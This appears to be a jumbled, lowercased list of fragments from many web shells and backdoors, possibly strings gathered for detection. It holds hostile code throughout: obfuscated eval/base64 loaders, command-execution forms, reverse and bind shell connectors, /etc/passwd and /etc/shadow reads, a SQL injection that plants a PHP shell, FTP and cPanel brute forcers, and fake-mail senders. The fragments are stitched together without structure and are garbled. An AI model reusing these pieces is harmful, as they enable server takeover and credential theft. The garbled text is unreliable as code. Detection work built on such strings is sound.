href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") 